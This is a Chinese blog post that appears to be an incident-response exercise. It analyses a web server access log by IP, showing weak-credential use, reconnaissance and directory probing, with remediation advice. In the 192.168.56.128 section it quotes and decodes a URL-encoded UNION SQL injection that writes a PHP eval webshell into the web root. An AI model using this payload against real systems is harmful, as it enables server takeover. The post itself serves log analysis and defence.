中間件的日志分析

將日志文件access.log復制到kali中進行分析

使用命令查看文件中各IP的訪問次數,依次分析其行為

awk '{ print $1 }' access.log | sort | uniq -c |sort -nr

172.16.3.189

cat access.log | grep '172.16.3.198'

行為模式分析

使用固定弱密碼進行身份驗證
幾乎所有請求都使用用戶名為 admin,密碼為MD5哈希值 202cb962ac59075b964b07152d234b70(對應明文 "123")。這是一種非常弱且常見的默認憑證。
在 2025年4月20日08:34:15的請求中,甚至嘗試使用了空密碼的MD5值 (d41d8cd98f00b204e9800998ecf8427e),這明顯是暴力破解或密碼噴灑攻擊的跡象,攻擊者正在系統性地嘗試極簡單或空的密碼。
高頻度、自動化的信息收集
該IP在多個日期(4月4日、5日、6日、10日、11日、12日、13日、14日、15日、20日、23日、24日、25日)重復訪問,模式固定,表明這完全是自動化腳本或工具的行為,而非人工操作。
其請求順序高度一致,總是先獲取 Config.txt,然后依次查詢客戶端EXE版本 (GetClientExeVer)、認證類型 (GETAUTHTYPE)、應用列表 (GETAppList)、注冊信息 (GetRegInfo),最后獲取特定應用 (GETApplication)。這是典型的系統偵察行為,旨在繪制系統藍圖,了解其配置和可利用的資產。
訪問敏感接口和數據
反復請求 GETAppList 和 GETApplication(AppID=APP00000001)等接口,目的是獲取服務器上部署的應用程序列表和詳細信息,這可能是下一步攻擊的目標。
請求 GetRegInfo 和 GetClientExeVer 是為了獲取系統的注冊信息和客戶端軟件版本,攻擊者借此尋找已知的版本漏洞進行利用。
潛在的權限維持嘗試
持續使用相同的計算機名 (Computer=CAIWU1) 和指紋 (Finger=AD8008ABB),這可能是一種嘗試,使其活動在系統中看起來像“正常”的客戶端行為,從而規避簡單的安全檢測。

安全威脅評估

綜合其行為模式,該IP地址的活動與自動化攻擊工具或惡意腳本的特征高度吻合,其目的可能包括:未授權訪問嘗試:利用弱密碼嘗試獲取系統權限。
系統偵察:大規模收集系統配置、應用信息和網絡結構。
漏洞探測:通過獲取的版本信息尋找可攻擊的安全漏洞。
數據竊取:獲取應用列表和系統信息可能為后續數據竊取做準備。

建議應對措施

立即阻斷: 在防火墻或入侵檢測系統上立即阻斷該IP地址(172.16.3.198)的所有訪問。
全面審計: 檢查服務器上是否有其他IP地址存在類似的可疑訪問模式。徹底審查系統,確認是否有任何異常賬戶、進程或文件被創建。
強化認證: 強制更改所有弱密碼和默認密碼,特別是admin賬戶。實施強密碼策略,并考慮啟用多因素認證(MFA)。
漏洞排查: 根據日志中暴露的應用程序和版本信息,檢查并修復相應的安全漏洞。
監控告警: 部署或調整安全監控規則,對類似的高頻、自動化訪問行為設置實時告警。
日志分析: 持續監控和分析訪問日志,以便及時發現和處理任何新的攻擊跡象。

172.16.3.1

cat access.log | grep -E '\b172.16.3.1\b'

行為模式分析

大量404典型的目錄探測行為

系統性的敏感文件探測
該IP地址在大量嘗試訪問常見的PHP信息文件,如 phpinfo.php, info.php, test.php 等。這些文件如果存在,會泄露服務器的詳細配置、環境變量、路徑等極度敏感的信息,為攻擊者下一步的攻擊提供藍圖
。
它還在探測各種可能包含敏感信息的目錄,如 /cgi-bin/, /scripts/,這通常是攻擊者嘗試讀取系統文件或執行命令的路徑。
Web應用與后臺登錄入口掃描
多次嘗試訪問諸如 /batavi/admin/index.php?login、/photopost/index.php 等路徑。這是在尋找特定Web應用程序(如Batavi、PhotoPost)的管理后臺登錄頁面。一旦發現,攻擊者可能會嘗試暴力破解或利用已知漏洞進行未授權訪問。
API接口探測
反復向 /cobbler_api 和 /spipe/pkg?Source=Agent_3.0.0 等接口發送POST請求。Cobbler是一個Linux安裝服務器,用于自動化系統部署。探測其API接口表明攻擊者可能正在尋找未授權的訪問點或已知的遠程命令執行漏洞,試圖控制部署系統。
自動化、周期性攻擊
攻擊活動集中在4月的多個日期(3,4,6,7,8,20,25日),且時間高度集中在早上7:55至7:56之間。這種精確的時間安排和跨多日的持續攻擊,強烈表明這完全是一個自動化腳本或工具在運行,而非人工操作。

安全威脅評估

綜合其行為模式,該IP地址的活動是典型的網絡偵察和初始入侵探測。其目的主要包括:信息收集:獲取服務器配置、軟件版本、目錄結構等關鍵信息。
漏洞發現:通過探測常見路徑和接口,尋找存在的Web應用漏洞或配置弱點。
尋找攻擊入口:定位管理后臺、API接口等,為后續的暴力破解、未授權訪問或漏洞利用做準備。

建議應對措施

立即封鎖IP:在防火墻、入侵檢測系統(IDS)或Web應用防火墻(WAF)上立即阻斷該IP地址(172.16.3.1)的所有訪問。
檢查服務器:雖然返回了404,但仍需確認服務器上確實不存在這些被請求的敏感文件(如 phpinfo.php)。如有,應立即刪除。
強化服務器配置:
對于Web服務器(如Apache/Nginx),禁用目錄瀏覽列表,防止攻擊者直接看到目錄內容。
確保所有敏感文件和目錄(如應用程序配置文件、日志文件等)權限設置正確,避免被Web用戶讀取。
加強監控與告警:
配置監控規則,對類似的高頻、自動化掃描行為(大量404請求)設置實時告警。
持續監控和分析訪問日志,以便及時發現和處理任何新的攻擊跡象。可以使用科來網絡分析系統等工具進行流量分析和安全檢測。
漏洞排查與更新:定期對系統進行安全掃描和漏洞評估,及時更新系統和應用軟件,修補已知的安全漏洞。

172.16.1.242

cat access.log | grep -E '\b172.16.1.242\b'

行為模式分析

自動化行為: 該 IP 的訪問表現出明顯的自動化、程序化特征。例如,在 4月25日08:36:35至08:36:40 的短短5秒內,連續發送了6個不同的請求來獲取配置、版本信息、應用列表等,這遠非人工操作所能及。
定期訪問: 活動時間集中在4月2日至4月25日的工作時間內(尤其早上8-9點),表明這可能是一種定時任務或上班時啟動的自動登錄/檢查更新流程。
目標明確: 其所有請求均指向 /RAPAgent.XGI 接口及其相關參數(CMD=GETApplication, GETAppList 等),表明這是一個專用于與“RAPAgent”系統交互的客戶端。

安全威脅評估

使用固定弱密碼進行身份驗證(高風險):
幾乎所有請求都使用用戶名為 admin,密碼為 MD5 哈希值 202cb962ac59075b964b07152d234b70(對應明文 "123")。這是一種非常弱且常見的默認憑證,極易被暴力破解或字典攻擊猜中。
惡意行為視角:使用弱密碼或默認憑證進行自動化嘗試是暴力破解攻擊和未授權訪問嘗試的典型特征。攻擊者經常利用弱密碼嘗試訪問系統資源。
高頻度、自動化的信息收集:
該IP在多個日期重復訪問,模式固定,表明這完全是自動化腳本或工具的行為。
其請求順序高度一致,總是先獲取基礎配置,然后查詢版本、認證類型、應用列表等。這是典型的系統偵察行為,旨在繪制系統藍圖,了解其配置和可利用的資產。
惡意行為視角:這種系統性的、自動化的信息收集行為與攻擊者在發起正式攻擊前進行的網絡偵察和指紋識別活動高度吻合。
訪問敏感接口和數據:
反復請求 GETAppList 和 GETApplication 等接口,目的是獲取服務器上部署的應用程序列表和詳細信息。
請求 GetRegInfo 和 GetClientExeVer 是為了獲取系統的注冊信息和客戶端軟件版本,攻擊者可借此尋找已知的版本漏洞進行利用。
惡意行為視角:掃描并獲取應用列表、系統配置、軟件版本等敏感信息,是攻擊者橫向移動和漏洞利用的前提。
潛在的權限維持嘗試:
持續使用相同的計算機名和指紋,這可能是一種嘗試,使其活動在系統中看起來像“正常”的客戶端行為,從而規避簡單的安全檢測。

建議應對措施

確認合法性:首先聯系網絡或系統管理員,確認 172.16.1.242 是授權的內部設備,并且其行為符合預期。
立即加強認證:立即更改 admin 賬戶的密碼,并實施更強的密碼策略(如復雜度要求、定期更換)。?強烈建議引入多因素認證(MFA)。
網絡隔離與訪問控制:對于此類自動化訪問設備,考慮是否需要進行網絡層隔離或嚴格的訪問控制列表(ACL)策略,限制其只能訪問必要的資源,遵循最小權限原則。
監控與審計:即使確認為合法行為,也建議持續監控該IP的活動,關注是否有異常行為(如非工作時段訪問、頻率異常增高、訪問非授權資源等)。部署入侵檢測系統(IDS)或啟用更詳細的日志記錄。
漏洞排查:根據日志中暴露的應用程序和版本信息(從 GetClientExeVer 等請求中獲取),?檢查并修復相應的安全漏洞。

192.168.56.128

cat access.log | grep -E '\b192.168.56.128\b'

行為模式分析

SQL注入攻擊(利用Union注入寫入Webshell) - 最嚴重的危害?
在 2025年4月21日18:08:51,該IP發起了一個極其危險的請求:
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3c%3fphp+eval%28%24_POST%5b%22cmd%22%5d%29%3b%3f%3e%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5Cpdyfzr7k.php%22+--+-
攻擊解析:
SQL注入:參數 user 的值包含 -1' union select,這是經典的Union聯合查詢注入手法。攻擊者利用應用程序對輸入校驗不嚴的漏洞,篡改了數據庫查詢邏輯。
寫入Webshell:注入的SQL語句核心是 into outfile "C:\\Program Files (x86)\\RealFriend\\Rap Server\\WebRoot\\pdyfzr7k.php",這會將一個PHP文件寫入服務器的網站根目錄。該PHP文件的內容是 <?php eval($_POST["cmd"]);?>,這是一個非常常見的Webshell,允許攻擊者通過POST參數 cmd 執行任意PHP代碼(即任意系統命令)。
這意味著攻擊者已成功利用漏洞,在你的服務器上植入了一個后門。
訪問并利用Webshell
在成功寫入Webshell的同一秒(18:08:51),該IP立即發起了 GET /pdyfzr7k.php HTTP/1.1 的請求, likely to verify the shell was created successfully.
更嚴重的是,在 4月24日22:21:40,該IP向Webshell發送了 POST /pdyfzr7k.php HTTP/1.1 請求。?POST請求意味著攻擊者正在通過該Webshell執行命令,很可能是在進行橫向移動、數據竊取或其他惡意操作。
系統與應用程序信息收集
在4月21日08:48:34,該IP進行了一系列針對 /RapAgent.XGI 接口的請求,包括獲取配置(Config.txt)、客戶端EXE版本(GetClientExeVer)、認證類型(GETAUTHTYPE)、應用列表(GETAppList)、注冊信息(GetRegInfo)。這同樣是典型的偵察行為,旨在詳細了解目標系統和應用的結構,為后續攻擊(包括上述的SQL注入)尋找突破口。
網站目錄結構探測
在4月22日11:16:41,該IP在極短時間內連續請求了大量靜態資源,包括圖片(/img/目錄下的多種png、gif)、JavaScript文件(/js/目錄下的jquery.js、easydialog.js、md5.js等)和CSS文件。這種高頻、自動化的請求模式類似于爬蟲,目的是摸清網站的目錄結構和文件分布,可能用于尋找其他漏洞、敏感文件(如備份文件、配置文件)或為后續的釣魚攻擊收集素材。

安全威脅評估

綜合其行為模式,該IP地址的活動是典型的入侵鏈條:信息收集(Reconnaissance):了解目標。
武器化(Weaponization):構造惡意的SQL注入載荷。
投放與利用(Delivery & Exploitation):發起攻擊,成功利用SQL注入漏洞。
安裝(Installation):在服務器上植入Webshell。
命令與控制(Command & Control):通過Webshell與服務器建立聯系并執行命令。
橫向移動(Lateral Movement):(可能正在進行)在內部網絡進行進一步探索。
這意味著服務器很可能已被攻陷,攻擊者獲得了相當程度的控制權。

建議應對措施

立即隔離與阻斷:
立即在防火墻或服務器上阻斷該IP地址(192.168.56.128)的所有訪問。
如果可能,將受影響的服務器離線或隔離出網絡,防止攻擊者進一步橫向移動。
漏洞排查與修復:
重點檢查 /AgentBoard.XGI 接口,修復其SQL注入漏洞。必須使用參數化查詢(預編譯語句)來徹底杜絕SQL注入,而不是簡單的字符串拼接或過濾。
全面審計代碼,查找是否存在類似的安全隱患。
清除Webshell與恢復系統:
立即刪除被植入的Webshell文件(C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\pdyfzr7k.php)。
從可信的備份中恢復被篡改的文件或系統(如果有)。
修改所有相關系統的密碼(數據庫、服務器OS等)。
全面安全審計:
檢查服務器上的其他文件是否被篡改或新增。
審查系統日志、數據庫日志,追蹤攻擊者的完整活動軌跡。
檢查是否存在其他后門或惡意賬戶。
加強防護與監控:
部署Web應用防火墻(WAF)來攔截常見的攻擊載荷。
對服務器文件(尤其是Web目錄)進行完整性監控,以便及時發現更改。
提升日志監控級別,對任何異常訪問設置警報。

192.168.56.1

cat access.log | grep -E '\b192.168.56.1\b'

行為模式分析

使用固定弱密碼進行身份驗證
幾乎所有請求都使用用戶名為 admin,密碼為 MD5哈希值 202cb962ac59075b964b07152d234b70(對應明文 "123")。這是一種非常弱且常見的默認憑證,極易被暴力破解或字典攻擊猜中
。
惡意行為視角:使用弱密碼或默認憑證進行自動化嘗試是暴力破解攻擊和未授權訪問嘗試的典型特征。攻擊者經常利用弱密碼嘗試訪問系統資源。高頻度、自動化的信息收集
該IP在短時間內(例如在 01/Apr/2025:09:28:55 到 09:28:57 的短短2秒內)連續發送了多個請求,順序固定(獲取 Config.txt、GetClientExeVer、GETAUTHTYPE、GETAppList、GetRegInfo),這完全是自動化腳本或工具的行為,遠非人工操作。
其請求旨在獲取系統的配置信息、客戶端軟件版本、認證類型、應用程序列表和注冊信息。這是典型的系統偵察行為,攻擊者借此繪制系統藍圖,了解其配置、資產和潛在可利用的漏洞
。
訪問敏感接口和數據
反復請求 GETAppList 和 GETApplication(AppID=APP00000001)等接口,目的是獲取服務器上部署的應用程序列表和詳細信息,這可能是下一步攻擊的目標。
請求 GetRegInfo 和 GetClientExeVer 是為了獲取系統的注冊信息和客戶端軟件版本,攻擊者可借此尋找已知的版本漏洞進行利用。
潛在的權限維持嘗試
持續使用相同的計算機名 (Computer=AD-DC) 和指紋 (Finger=AF28A4097),這可能是一種嘗試,使其活動在系統中看起來像“正常”的客戶端行為,從而規避簡單的安全檢測。

安全威脅評估

綜合其行為模式,該IP地址的活動與自動化攻擊工具或惡意腳本的特征高度吻合,其目的可能包括:未授權訪問嘗試:利用弱密碼嘗試獲取系統權限。
系統偵察:大規模收集系統配置、應用信息和網絡結構。
漏洞探測:通過獲取的版本信息尋找可攻擊的安全漏洞。
雖然目前這些請求都返回了 200(成功),但這并不意味著安全。成功的偵察是許多更嚴重攻擊(如數據竊取、漏洞利用、橫向移動)的第一步。

建議應對措施

立即阻斷:在防火墻或入侵檢測系統上立即阻斷該IP地址(192.168.56.1)的所有訪問,并進行溯源,確認該內網設備的合法性。
全面審計:檢查服務器上是否有其他IP地址存在類似的可疑訪問模式。徹底審查系統,確認是否有任何異常賬戶、進程或文件被創建。
強化認證:強制更改所有弱密碼和默認密碼,特別是admin賬戶。實施強密碼策略,并考慮啟用多因素認證(MFA)。
漏洞排查:根據日志中暴露的應用程序和版本信息(從 GetClientExeVer 等請求中獲取),檢查并修復相應的安全漏洞。
監控告警:部署或調整安全監控規則,對類似的高頻、自動化訪問行為設置實時告警。
網絡隔離:對于此類內部網絡設備,也應遵循最小權限原則,確保其只能訪問必要的資源。

確認攻擊行為成功ip

192.168.56.128

事件發生的時間節點

02/Apr/2025:19:11:17~24/Apr/2025:22:21:40 +0800

攻擊行為

通過sql注入寫入webshell

處置建議

隔離服務器:立即將這臺服務器從網絡中斷開,防止攻擊者進一步訪問內網或其他系統。
清除WebShell:找到并刪除 C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\pdyfzr7k.php 文件。
徹底檢查:檢查服務器上的其他文件、計劃任務、新增用戶賬號、最近修改的系統文件等,排查是否存在攻擊者留下的其他后門或惡意軟件。不要相信現有的系統日志,攻擊者可能已將其清除或篡改。
修復漏洞:審查 AgentBoard.XGI 程序的代碼,修復存在的SQL注入漏洞。
更改所有憑據:更改所有相關的用戶名和密碼,特別是admin賬戶的密碼,不要使用弱口令。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/96283.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/96283.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/96283.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【Big Data】云原生與AI時代的存儲基石 Apache Ozone 的技術演進路徑

目錄 一、Apache Ozone是什么&#xff1f; 二、Ozone的誕生背景 三、Ozone的架構設計 1. 分層架構設計 2. Ozone Manager (OM) 3. Storage Container Manager (SCM) 4. DataNode 5. Raft協議應用 四、Ozone解決的關鍵問題 1. 元數據管理瓶頸 2. 小文件性能問題 3. …

抖音直播禮物彈幕抓取工具:技術實現與功能解析

基于Python的直播間數據采集技術實踐一、項目概述基于Python開發的直播間數據采集方案&#xff0c;采用最新簽名算法(dysign)實現穩定連接&#xff0c;實時獲取直播間各類互動數據&#xff0c;為直播數據分析和互動應用開發提供技術支持。二、核心功能實時消息監控用戶進入提醒…

添加地址頁面,可以添加復制粘貼,自動識別地址的功能uniapp實現方式

主要用uni.getClipboardData(OBJECT)&#xff0c;更多信息可以到uniapp官網查看以下實現方式 1利用api, 2針對判斷優化方案&#xff0c;在線APIhandleConfirm2(){let that this;promisRequest({url: https://wangzc.wang/smAddress,data: {"address": that.…

ESP32 驅動 PWM 舵機為什么必須共地?——從原理到實踐全解析

在使用 ESP32 控制 PWM 舵機 的過程中,新手經常遇到一個常見問題:舵機不動、亂動、甚至燒壞芯片。 其中最典型的原因,就是沒有正確共地。 很多初學者會疑惑:“外接電池只是給舵機供電,為什么還要把電池的地線接到 ESP32 的 GND 上呢?” 本文將從 信號邏輯、閉合回路、…

細菌基因組genome二代測序數據分析

kraken2去除污染conda create -n kraken2 conda activate kraken2 conda install kraken2 -c bioconda mkdir kraken2_outputkraken2 --db ../../kraken2_db/k2_pluspf_20250402/ --threads 8 --paired 250811_HS67EV0804_R1.fastq.gz 250811_HS67EV0804_R2.fastq.gz --use-nam…

工業網絡架構的未來:智慧化工廠中的低延遲與高可靠性設計

1. 引言工業網絡正經歷從傳統有線到無線、從低速到高速的全面升級。某鋁箔智慧工廠專注于新能源鋁箔的生產&#xff0c;依賴低延遲、高可靠的網絡支持實現生產控制與智能管理。本文將探討某鋁箔智慧工廠網絡架構設計的關鍵點及其實施策略。2. 某鋁箔智慧工廠的網絡挑戰多終端接…

Android14 init.rc中on boot階段操作4

Android14 init.rc中on early-init, init, late-init, early-fs, post-fs階段詳解1 Android14 init.rc的on late-fs, post-fs-data階段主要操作詳解2 Android14 init.rc中啟動Zygote詳解3 Android14 init.rc中on boot階段操作4 1 on boot和低內存設備的啟動優化 僅在ro.con…

CodeSandbox Desktop:零配置項目啟動工具,實現項目環境隔離與Github無縫同步

你有沒有過為了跑一個簡單的 Demo&#xff0c;花半小時配置環境還失敗的經歷&#xff1f;比如想測試一個 Vue3 組件&#xff0c;先裝 Node.js&#xff0c;結果版本太高和項目依賴不兼容&#xff1b;換低版本又提示 “找不到 python 環境”&#xff1b;好不容易裝完依賴&#xf…

人工智能-python-深度學習-經典神經網絡AlexNet

AlexNet&#xff08;詳解&#xff09;——從原理到 PyTorch 實現&#xff08;含訓練示例&#xff09; 文章目錄AlexNet&#xff08;詳解&#xff09;——從原理到 PyTorch 實現&#xff08;含訓練示例&#xff09;1. 發展歷史與比賽成績2. AlexNet 的核心思想&#xff08;一句話…

《sklearn機器學習——指標和評分1》

3個不同的API可供評估模型預測質量&#xff1a; 評估器評分方法&#xff1a;評估器有一個score方法&#xff0c;它給計劃解決的問題提供一個初始評估標準。這部分內容不在這里討論&#xff0c;但會出現在每一個評估器的文件中。 評分參數&#xff1a;使用交叉驗證&#xff08;…

人工智能中的線性代數總結--簡單篇

numpy庫中的dot函數來計算矩陣和向量的點積def matrix_vector_dot_product(a, b):import numpy as npif (len(a[0]) ! len(b)):return -1# 使用tolist()將結果轉換為列表return np.dot(a, b).tolist()原始方法def matrix_vector_dot_product(matrix, vector):if len(matrix[0])…

又是全網首創/純Qt實現28181設備模擬器/rtp視頻點播/桌面轉28181/任意文件轉28181/跨平臺

一、前言說明 這個工具前前后后也算是廢了不少功夫&#xff0c;最開始是因為28181服務端的組件已經完美實現&#xff0c;對照國標文檔看了很多遍&#xff0c;逐個實現需要的交互協議&#xff0c;整體上比onvif協議要難不少&#xff0c;主要是涉及到的東西比較多&#xff0c;有…

安卓逆向(一)Ubuntu環境配置

一、Ubuntu 1、虛擬機 首先準備一個Ubuntu的虛擬機&#xff0c;就隨便新建一個就行&#xff0c;我這里使用的是Ubuntu21.04&#xff0c;但是內存跟硬盤大小最好設置的稍微大一點。 2、基礎環境 &#xff08;1&#xff09;解決apt-get update報錯問題 apt-get是Linux系統中一個管…

Go 1.25在性能方面做了哪些提升?

Go 1.25 在性能方面帶來了多項重要提升&#xff0c;主要有以下幾個方面&#xff1a; 實驗性垃圾回收器 GreenTea GC&#xff1a;針對小對象密集型應用優化&#xff0c;顯著提升小對象標記和掃描性能&#xff0c;垃圾回收開銷減少0-40%&#xff0c;暫停時間縮短&#xff0c;吞吐…

Python與XML文件處理詳解(2續):xml.dom.minidom模塊高階使用方法

目錄 第一部分:高級節點操作與遍歷方法 1.1 更精確的節點導航 1.2 使用 cloneNode() 復制節點 1.3 節點插入、替換與高級管理 第二部分:文檔創建與高級輸出控制 2.1 使用 Document 工廠方法完整創建文檔 2.2 高級輸出與序列化控制 第三部分:實用工具函數與模式處理 …

如何利用 ChatGPT 輔助寫作

引言 介紹人工智能輔助寫作的興起&#xff0c;ChatGPT 在寫作領域的應用潛力&#xff0c;以及本文的核心目標。 ChatGPT 在寫作中的核心功能 概述 ChatGPT 的主要功能&#xff0c;包括文本生成、潤色、結構優化、靈感激發等。 利用 ChatGPT 輔助寫作的具體方法 生成創意與靈感 …

【有鹿機器人自述】我在社區的365天:掃地、賣萌、治愈人心

大家好&#xff0c;我是有鹿巡掃機器人&#xff0c;編號RD-07。今天我想和大家分享這一年來的工作見聞——沒錯&#xff0c;我們機器人也會"觀察"和"感受"&#xff0c;尤其是在連合直租將我送到這個社區后&#xff0c;發生的點點滴滴讓我擁有了前所未有的&…

第五十五天(SQL注入增刪改查HTTP頭UAXFFRefererCookie無回顯報錯復盤)

#數據庫知識&#xff1a; 1、數據庫名&#xff0c;表名&#xff0c;列名&#xff0c;數據 2、自帶數據庫&#xff0c;數據庫用戶及權限 3、數據庫敏感函數&#xff0c;默認端口及應用 4、數據庫查詢方法&#xff08;增加刪除修改更新&#xff09; #SQL注入產生原理&#xf…

怎么用 tauri 創建一個桌面應用程序(Electron)

以前用 Electron 做過一個桌面應用程序&#xff0c;打包體積確實很大&#xff0c;啟動也很慢。這次先 tauri。 并且用 bun 代替 npm 速度更快&#xff0c;避免總是出現依賴問題。 前端用 react 為了學習下&#xff0c;用 js 先現在主流的 typescript。 安裝 bun npm instal…

【通過Docker快速部署Tomcat9.0】

文章目錄前言一、部署docker二、部署Tomcat2.1 創建存儲卷2.2 運行tomcat容器2.3 查看tomcat容器2.4 查看端口是否監聽2.5 防火墻開放端口三、訪問Tomcat前言 Tomcat介紹 Tomcat 是由 Apache 軟件基金會&#xff08;Apache Software Foundation&#xff09;開發的一個開源 Jav…